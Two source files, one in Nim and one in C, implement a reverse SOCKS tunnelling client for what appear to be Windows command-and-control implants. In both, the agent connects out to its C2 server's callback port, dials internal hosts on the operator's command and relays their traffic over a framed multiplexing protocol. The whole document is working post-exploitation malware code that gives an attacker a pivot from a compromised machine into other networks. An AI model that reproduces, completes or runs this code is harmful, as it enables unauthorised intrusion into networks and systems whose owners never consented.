File: agents/agent-nim/rsocks.nim
## rsocks.nim — Reverse SOCKS mux client.
## Agent connects outbound to C2's callback port.
## Frame protocol: 9-byte header [streamID:u32LE][type:u8][payloadLen:u32LE][payload]
## SYN=1 (C2→agent: dial target), DATA=2, FIN=3, OK=4, ERR=5

import winim/lean
import std/strutils
import config

const MAX_STREAMS = 512
const RS_SYN*  : byte = 1
const RS_DATA* : byte = 2
const RS_FIN*  : byte = 3
const RS_OK*   : byte = 4
const RS_ERR*  : byte = 5

var gRSocksC2     {.volatile.}: SOCKET = INVALID_SOCKET
var gRSocksStop   {.volatile.}: bool   = true
var gRSocksThread: HANDLE = 0

# streamID → target socket (index = sid mod MAX_STREAMS)
var gRSocksStreams:    array[MAX_STREAMS, SOCKET]
var gRSocksStreamIDs: array[MAX_STREAMS, uint32]  # to detect collisions
var gRSocksWriteLock:  CRITICAL_SECTION
var gRSocksStreamLock: CRITICAL_SECTION
var gRSocksLocksInited = false

proc initRSocksLocks*() =
  if not gRSocksLocksInited:
    gRSocksLocksInited = true
    InitializeCriticalSection(addr gRSocksWriteLock)
    InitializeCriticalSection(addr gRSocksStreamLock)
    for i in 0..<MAX_STREAMS:
      gRSocksStreams[i]    = INVALID_SOCKET
      gRSocksStreamIDs[i] = 0xFFFFFFFF'u32

proc parseRSocksHost*(url: string): string =
  var s = url
  if s.startsWith("https://"): s = s[8..^1]
  elif s.startsWith("http://"): s = s[7..^1]
  let si = s.find('/')
  if si >= 0: s = s[0..<si]
  let ci = s.rfind(':')
  if ci >= 0: return s[0..<ci]
  return s

proc rsWriteFrame*(sid: uint32; ft: byte; data: ptr byte; dataLen: int32) =
  var hdr: array[9, byte]
  hdr[0] = byte(sid); hdr[1] = byte(sid shr 8)
  hdr[2] = byte(sid shr 16); hdr[3] = byte(sid shr 24)
  hdr[4] = ft
  let pl = uint32(dataLen)
  hdr[5] = byte(pl); hdr[6] = byte(pl shr 8)
  hdr[7] = byte(pl shr 16); hdr[8] = byte(pl shr 24)
  EnterCriticalSection(addr gRSocksWriteLock)
  let c2 = gRSocksC2
  if c2 != INVALID_SOCKET:
    discard send(c2, cast[ptr char](addr hdr[0]), 9, 0)
    if dataLen > 0 and data != nil:
      discard send(c2, cast[ptr char](data), dataLen, 0)
  LeaveCriticalSection(addr gRSocksWriteLock)

type StreamRelayParam = object
  streamID:   uint32
  targetSock: SOCKET

proc streamRelayProc(p: LPVOID): DWORD {.stdcall.} =
  if p == nil: return 1
  let sp = cast[ptr StreamRelayParam](p)
  let sid    = sp.streamID
  let target = sp.targetSock
  dealloc(p)
  var buf: array[32768, byte]
  while not gRSocksStop:
    let n = recv(target, cast[ptr char](addr buf[0]), int32(32768), 0)
    if n <= 0: break
    rsWriteFrame(sid, RS_DATA, cast[ptr byte](addr buf[0]), n)
  # Clean up stream entry
  EnterCriticalSection(addr gRSocksStreamLock)
  let idx = int(sid mod MAX_STREAMS)
  if gRSocksStreams[idx] == target:
    gRSocksStreams[idx]    = INVALID_SOCKET
    gRSocksStreamIDs[idx]  = 0xFFFFFFFF'u32
  LeaveCriticalSection(addr gRSocksStreamLock)
  discard closesocket(target)
  rsWriteFrame(sid, RS_FIN, nil, 0)
  return 0

type SynParam = object
  streamID: uint32
  target:   array[512, char]

proc synHandlerProc(p: LPVOID): DWORD {.stdcall.} =
  if p == nil: return 1
  let sp  = cast[ptr SynParam](p)
  let sid = sp.streamID
  var targetStr = $cast[cstring](addr sp.target[0])
  dealloc(p)
  let ci = targetStr.rfind(':')
  if ci < 0:
    var errMsg = "invalid target"
    rsWriteFrame(sid, RS_ERR, cast[ptr byte](addr errMsg[0]), int32(errMsg.len))
    return 1
  let hostStr = targetStr[0..<ci]
  let portStr = targetStr[ci+1..^1].strip()
  var portNum = 0
  try: portNum = parseInt(portStr) except: discard
  if portNum <= 0 or portNum > 65535:
    var errMsg = "invalid port: " & portStr
    rsWriteFrame(sid, RS_ERR, cast[ptr byte](addr errMsg[0]), int32(errMsg.len))
    return 1
  var wsaData: WSADATA
  discard WSAStartup(WORD(0x0202), addr wsaData)
  let tSock = socket(int32(AF_INET), int32(SOCK_STREAM), int32(IPPROTO_TCP))
  if tSock == INVALID_SOCKET:
    var errMsg = "socket() failed"
    rsWriteFrame(sid, RS_ERR, cast[ptr byte](addr errMsg[0]), int32(errMsg.len))
    return 1
  var saddr: sockaddr_in
  saddr.sin_family = int16(AF_INET)
  saddr.sin_port   = htons(uint16(portNum))
  var hostCS = hostStr & "\x00"
  let ipAddr = inet_addr(addr hostCS[0])
  if ipAddr == INADDR_NONE:
    let he = gethostbyname(addr hostCS[0])
    if he == nil or he.h_addr_list == nil or he.h_addr_list[] == nil:
      discard closesocket(tSock)
      var errMsg = "resolve failed: " & hostStr
      rsWriteFrame(sid, RS_ERR, cast[ptr byte](addr errMsg[0]), int32(errMsg.len))
      return 1
    saddr.sin_addr.S_addr = cast[ptr int32](he.h_addr_list[])[]
  else:
    saddr.sin_addr.S_addr = ipAddr
  if connect(tSock, cast[ptr sockaddr](addr saddr), int32(sizeof(saddr))) != 0:
    discard closesocket(tSock)
    var errMsg = "connect failed: " & hostStr & ":" & portStr
    rsWriteFrame(sid, RS_ERR, cast[ptr byte](addr errMsg[0]), int32(errMsg.len))
    return 1
  let idx = int(sid mod MAX_STREAMS)
  EnterCriticalSection(addr gRSocksStreamLock)
  gRSocksStreams[idx]   = tSock
  gRSocksStreamIDs[idx] = sid
  LeaveCriticalSection(addr gRSocksStreamLock)
  rsWriteFrame(sid, RS_OK, nil, 0)
  let rp = cast[ptr StreamRelayParam](alloc0(sizeof(StreamRelayParam)))
  rp.streamID   = sid
  rp.targetSock = tSock
  var rtid: DWORD = 0
  discard CloseHandle(CreateThread(nil, 0, streamRelayProc, cast[LPVOID](rp), 0, addr rtid))
  return 0

proc recvExactRS(sock: SOCKET; buf: ptr byte; n: int): bool =
  var got = 0
  while got < n:
    let r = recv(sock, cast[ptr char](cast[int](buf) + got), int32(n - got), 0)
    if r <= 0: return false
    got += r
  return true

proc rsocksMainProc(p: LPVOID): DWORD {.stdcall.} =
  var hdr: array[9, byte]
  while not gRSocksStop:
    if not recvExactRS(gRSocksC2, cast[ptr byte](addr hdr[0]), 9): break
    let sid = uint32(hdr[0]) or (uint32(hdr[1]) shl 8) or
              (uint32(hdr[2]) shl 16) or (uint32(hdr[3]) shl 24)
    let ft     = hdr[4]
    let payLen = int(uint32(hdr[5]) or (uint32(hdr[6]) shl 8) or
                     (uint32(hdr[7]) shl 16) or (uint32(hdr[8]) shl 24))
    var payload: pointer = nil
    if payLen > 0:
      payload = alloc0(payLen + 1)
      if not recvExactRS(gRSocksC2, cast[ptr byte](payload), payLen):
        dealloc(payload)
        break
    case ft
    of RS_SYN:
      let sp = cast[ptr SynParam](alloc0(sizeof(SynParam)))
      sp.streamID = sid
      let tlen = min(payLen, 511)
      if tlen > 0 and payload != nil:
        copyMem(addr sp.target[0], payload, tlen)
      sp.target[tlen] = '\0'
      if payload != nil: dealloc(payload); payload = nil
      var stid: DWORD = 0
      discard CloseHandle(CreateThread(nil, 0, synHandlerProc, cast[LPVOID](sp), 0, addr stid))
    of RS_DATA:
      let idx = int(sid mod MAX_STREAMS)
      EnterCriticalSection(addr gRSocksStreamLock)
      let tSock = gRSocksStreams[idx]
      LeaveCriticalSection(addr gRSocksStreamLock)
      if tSock != INVALID_SOCKET and payLen > 0 and payload != nil:
        discard send(tSock, cast[ptr char](payload), int32(payLen), 0)
    of RS_FIN:
      let idx = int(sid mod MAX_STREAMS)
      EnterCriticalSection(addr gRSocksStreamLock)
      let tSock = gRSocksStreams[idx]
      if tSock != INVALID_SOCKET and gRSocksStreamIDs[idx] == sid:
        gRSocksStreams[idx]   = INVALID_SOCKET
        gRSocksStreamIDs[idx] = 0xFFFFFFFF'u32
        discard closesocket(tSock)
      LeaveCriticalSection(addr gRSocksStreamLock)
    else: discard
    if payload != nil: dealloc(payload)
  # Cleanup
  gRSocksStop = true
  EnterCriticalSection(addr gRSocksStreamLock)
  for i in 0..<MAX_STREAMS:
    if gRSocksStreams[i] != INVALID_SOCKET:
      discard closesocket(gRSocksStreams[i])
      gRSocksStreams[i]    = INVALID_SOCKET
      gRSocksStreamIDs[i]  = 0xFFFFFFFF'u32
  LeaveCriticalSection(addr gRSocksStreamLock)
  if gRSocksC2 != INVALID_SOCKET:
    discard closesocket(gRSocksC2)
    gRSocksC2 = INVALID_SOCKET
  return 0

proc startRSocks*(callbackPort: string): string =
  initRSocksLocks()
  if not gRSocksStop or gRSocksC2 != INVALID_SOCKET:
    return "[-] rsocks already running"
  let host = parseRSocksHost(ServerUrl)
  if host == "": return "[-] rsocks: cannot determine C2 host from ServerUrl"
  var portNum = 0
  try: portNum = parseInt(callbackPort.strip()) except: discard
  if portNum <= 0 or portNum > 65535:
    return "[-] rsocks: invalid port: " & callbackPort
  var wsaData: WSADATA
  discard WSAStartup(WORD(0x0202), addr wsaData)
  let sock = socket(int32(AF_INET), int32(SOCK_STREAM), int32(IPPROTO_TCP))
  if sock == INVALID_SOCKET: return "[-] rsocks: socket() failed"
  var saddr: sockaddr_in
  saddr.sin_family = int16(AF_INET)
  saddr.sin_port   = htons(uint16(portNum))
  var hostCS = host & "\x00"
  let ipAddr = inet_addr(addr hostCS[0])
  if ipAddr == INADDR_NONE:
    let he = gethostbyname(addr hostCS[0])
    if he == nil or he.h_addr_list == nil or he.h_addr_list[] == nil:
      discard closesocket(sock)
      return "[-] rsocks: resolve failed: " & host
    saddr.sin_addr.S_addr = cast[ptr int32](he.h_addr_list[])[]
  else:
    saddr.sin_addr.S_addr = ipAddr
  if connect(sock, cast[ptr sockaddr](addr saddr), int32(sizeof(saddr))) != 0:
    discard closesocket(sock)
    return "[-] rsocks: connect " & host & ":" & callbackPort & " failed (err " & $WSAGetLastError() & ")"
  gRSocksC2   = sock
  gRSocksStop = false
  var tid: DWORD = 0
  gRSocksThread = CreateThread(nil, 0, rsocksMainProc, nil, 0, addr tid)
  if gRSocksThread == 0:
    gRSocksStop = true
    discard closesocket(sock)
    gRSocksC2 = INVALID_SOCKET
    return "[-] rsocks: CreateThread failed"
  return "[+] rsocks connected to " & host & ":" & callbackPort

proc stopRSocks*(): string =
  if gRSocksStop and gRSocksC2 == INVALID_SOCKET:
    return "[-] rsocks: not running"
  gRSocksStop = true
  if gRSocksC2 != INVALID_SOCKET:
    discard closesocket(gRSocksC2)
  if gRSocksThread != 0:
    discard WaitForSingleObject(gRSocksThread, DWORD(3000))
    discard CloseHandle(gRSocksThread)
    gRSocksThread = 0
  return "[+] rsocks stopped"

File: agents/agent-c/rsocks.c
/* rsocks.c — Reverse SOCKS mux client for the C agent.
 * Agent dials C2 callback port. Frame: [sid:u32LE][type:u8][len:u32LE][payload]
 * SYN=1, DATA=2, FIN=3, OK=4, ERR=5
 */
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include "api_resolve.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "config.h"
#include "rsocks.h"

#pragma comment(lib, "ws2_32.lib")

#define RS_SYN  1
#define RS_DATA 2
#define RS_FIN  3
#define RS_OK   4
#define RS_ERR  5
#define MAX_STREAMS 512

static volatile SOCKET g_rs_c2   = INVALID_SOCKET;
static volatile int    g_rs_stop = 1;
static HANDLE          g_rs_thr  = NULL;

typedef struct { uint32_t sid; SOCKET tsock; } StreamEntry;
static StreamEntry g_streams[MAX_STREAMS];
static CRITICAL_SECTION g_rs_write_cs, g_rs_stream_cs;
static int g_cs_inited = 0;

static void rs_cs_init(void) {
    if (!g_cs_inited) {
        g_cs_inited = 1;
        InitializeCriticalSection(&g_rs_write_cs);
        InitializeCriticalSection(&g_rs_stream_cs);
        for (int i = 0; i < MAX_STREAMS; i++) {
            g_streams[i].sid   = 0xFFFFFFFF;
            g_streams[i].tsock = INVALID_SOCKET;
        }
    }
}

static void rs_write_frame(uint32_t sid, uint8_t ft, const void *data, uint32_t dlen) {
    uint8_t hdr[9];
    memcpy(hdr,   &sid,  4);
    hdr[4] = ft;
    memcpy(hdr+5, &dlen, 4);
    EnterCriticalSection(&g_rs_write_cs);
    if (g_rs_c2 != INVALID_SOCKET) {
        send((SOCKET)g_rs_c2, (const char*)hdr, 9, 0);
        if (dlen > 0 && data) send((SOCKET)g_rs_c2, (const char*)data, (int)dlen, 0);
    }
    LeaveCriticalSection(&g_rs_write_cs);
}

typedef struct { uint32_t sid; SOCKET tsock; } RelayParam;

static DWORD WINAPI relay_proc(LPVOID p) {
    RelayParam *rp = (RelayParam*)p;
    uint32_t sid = rp->sid; SOCKET ts = rp->tsock; free(rp);
    char buf[32768];
    while (!g_rs_stop) {
        int n = recv(ts, buf, sizeof(buf), 0);
        if (n <= 0) break;
        rs_write_frame(sid, RS_DATA, buf, (uint32_t)n);
    }
    /* clean up stream table */
    EnterCriticalSection(&g_rs_stream_cs);
    int idx = (int)(sid % MAX_STREAMS);
    if (g_streams[idx].tsock == ts) { g_streams[idx].sid = 0xFFFFFFFF; g_streams[idx].tsock = INVALID_SOCKET; }
    LeaveCriticalSection(&g_rs_stream_cs);
    closesocket(ts);
    rs_write_frame(sid, RS_FIN, NULL, 0);
    return 0;
}

typedef struct { uint32_t sid; char target[512]; } SynParam;

static DWORD WINAPI syn_proc(LPVOID p) {
    SynParam *sp = (SynParam*)p;
    uint32_t sid = sp->sid;
    char *colon = strrchr(sp->target, ':');
    if (!colon) { char e[] = "invalid target"; rs_write_frame(sid, RS_ERR, e, (uint32_t)strlen(e)); free(sp); return 1; }
    *colon = '\0';
    int port = atoi(colon+1);
    char host[256]; strncpy(host, sp->target, sizeof(host)-1); free(sp);
    struct addrinfo hints = {0}, *res = NULL;
    char port_str[8]; snprintf(port_str, sizeof(port_str), "%d", port);
    hints.ai_family = AF_INET; hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, port_str, &hints, &res) != 0 || !res) {
        char e[64]; snprintf(e, sizeof(e), "resolve failed: %s", host);
        rs_write_frame(sid, RS_ERR, e, (uint32_t)strlen(e)); return 1;
    }
    SOCKET ts = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (ts == INVALID_SOCKET) { freeaddrinfo(res); char e[]="socket failed"; rs_write_frame(sid,RS_ERR,e,(uint32_t)strlen(e)); return 1; }
    if (connect(ts, res->ai_addr, (int)res->ai_addrlen) != 0) {
        freeaddrinfo(res); closesocket(ts);
        char e[64]; snprintf(e, sizeof(e), "connect failed: %s:%d", host, port);
        rs_write_frame(sid, RS_ERR, e, (uint32_t)strlen(e)); return 1;
    }
    freeaddrinfo(res);
    EnterCriticalSection(&g_rs_stream_cs);
    int idx = (int)(sid % MAX_STREAMS);
    g_streams[idx].sid   = sid;
    g_streams[idx].tsock = ts;
    LeaveCriticalSection(&g_rs_stream_cs);
    rs_write_frame(sid, RS_OK, NULL, 0);
    RelayParam *rp = (RelayParam*)malloc(sizeof(RelayParam));
    rp->sid = sid; rp->tsock = ts;
    HANDLE h = CreateThread(NULL, 0, relay_proc, rp, 0, NULL);
    if (h) CloseHandle(h);
    return 0;
}

static int recv_exact(SOCKET s, void *buf, int n) {
    int got = 0;
    while (got < n) { int r = recv(s, (char*)buf+got, n-got, 0); if (r <= 0) return 0; got += r; }
    return 1;
}

static DWORD WINAPI rs_main_proc(LPVOID p) {
    (void)p;
    uint8_t hdr[9];
    while (!g_rs_stop) {
        if (!recv_exact((SOCKET)g_rs_c2, hdr, 9)) break;
        uint32_t sid; memcpy(&sid, hdr, 4);
        uint8_t ft = hdr[4];
        uint32_t pay_len; memcpy(&pay_len, hdr+5, 4);
        void *payload = NULL;
        if (pay_len > 0) {
            payload = malloc(pay_len+1);
            if (!payload || !recv_exact((SOCKET)g_rs_c2, payload, (int)pay_len)) { free(payload); break; }
            ((char*)payload)[pay_len] = '\0';
        }
        switch (ft) {
        case RS_SYN: {
            SynParam *sp = (SynParam*)malloc(sizeof(SynParam));
            sp->sid = sid;
            strncpy(sp->target, payload ? (char*)payload : "", sizeof(sp->target)-1);
            free(payload); payload = NULL;
            HANDLE h = CreateThread(NULL, 0, syn_proc, sp, 0, NULL);
            if (h) CloseHandle(h);
            break; }
        case RS_DATA: {
            int idx = (int)(sid % MAX_STREAMS);
            EnterCriticalSection(&g_rs_stream_cs);
            SOCKET ts = g_streams[idx].tsock;
            LeaveCriticalSection(&g_rs_stream_cs);
            if (ts != INVALID_SOCKET && pay_len > 0 && payload)
                send(ts, (const char*)payload, (int)pay_len, 0);
            break; }
        case RS_FIN: {
            int idx = (int)(sid % MAX_STREAMS);
            EnterCriticalSection(&g_rs_stream_cs);
            if (g_streams[idx].sid == sid && g_streams[idx].tsock != INVALID_SOCKET) {
                closesocket(g_streams[idx].tsock);
                g_streams[idx].tsock = INVALID_SOCKET; g_streams[idx].sid = 0xFFFFFFFF;
            }
            LeaveCriticalSection(&g_rs_stream_cs);
            break; }
        default: break;
        }
        if (payload) free(payload);
    }
    g_rs_stop = 1;
    /* close all streams */
    EnterCriticalSection(&g_rs_stream_cs);
    for (int i = 0; i < MAX_STREAMS; i++) {
        if (g_streams[i].tsock != INVALID_SOCKET) { closesocket(g_streams[i].tsock); g_streams[i].tsock = INVALID_SOCKET; g_streams[i].sid = 0xFFFFFFFF; }
    }
    LeaveCriticalSection(&g_rs_stream_cs);
    if (g_rs_c2 != INVALID_SOCKET) { closesocket((SOCKET)g_rs_c2); g_rs_c2 = INVALID_SOCKET; }
    return 0;
}

static char *parse_c2_host(char *out, size_t outsz) {
    const char *url = AGENT_SERVER_URL;
    if (strncmp(url, "https://", 8) == 0) url += 8;
    else if (strncmp(url, "http://",  7) == 0) url += 7;
    const char *end = strchr(url, '/'); if (!end) end = url + strlen(url);
    size_t len = (size_t)(end - url);
    if (len >= outsz) len = outsz - 1;
    strncpy(out, url, len); out[len] = '\0';
    /* strip :port */
    char *colon = strrchr(out, ':');
    if (colon) *colon = '\0';
    return out;
}

char *rsocks_start(const char *port_str) {
    WSADATA wsa; WSAStartup(MAKEWORD(2,2), &wsa);
    rs_cs_init();
    if (!g_rs_stop || g_rs_c2 != INVALID_SOCKET) {
        return _strdup("[-] rsocks already running");
    }
    int port = atoi(port_str);
    if (port <= 0 || port > 65535) {
        char *e = (char*)malloc(64); snprintf(e, 64, "[-] rsocks: invalid port: %s", port_str); return e;
    }
    char host[256]; parse_c2_host(host, sizeof(host));
    char port_s[8]; snprintf(port_s, sizeof(port_s), "%d", port);
    struct addrinfo hints = {0}, *res = NULL;
    hints.ai_family = AF_INET; hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, port_s, &hints, &res) != 0 || !res) {
        char *e = (char*)malloc(128); snprintf(e, 128, "[-] rsocks: resolve failed: %s", host); return e;
    }
    SOCKET s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) { freeaddrinfo(res); return _strdup("[-] rsocks: socket() failed"); }
    if (connect(s, res->ai_addr, (int)res->ai_addrlen) != 0) {
        freeaddrinfo(res); closesocket(s);
        char *e = (char*)malloc(128); snprintf(e, 128, "[-] rsocks: connect %s:%s failed", host, port_str); return e;
    }
    freeaddrinfo(res);
    g_rs_c2   = s;
    g_rs_stop = 0;
    g_rs_thr  = CreateThread(NULL, 0, rs_main_proc, NULL, 0, NULL);
    if (!g_rs_thr) { g_rs_stop = 1; closesocket(s); g_rs_c2 = INVALID_SOCKET; return _strdup("[-] rsocks: CreateThread failed"); }
    char *out = (char*)malloc(128); snprintf(out, 128, "[+] rsocks connected to %s:%s", host, port_str); return out;
}

void rsocks_stop(void) {
    g_rs_stop = 1;
    if (g_rs_c2 != INVALID_SOCKET) { closesocket((SOCKET)g_rs_c2); }
    if (g_rs_thr) { WaitForSingleObject(g_rs_thr, 3000); CloseHandle(g_rs_thr); g_rs_thr = NULL; }
}
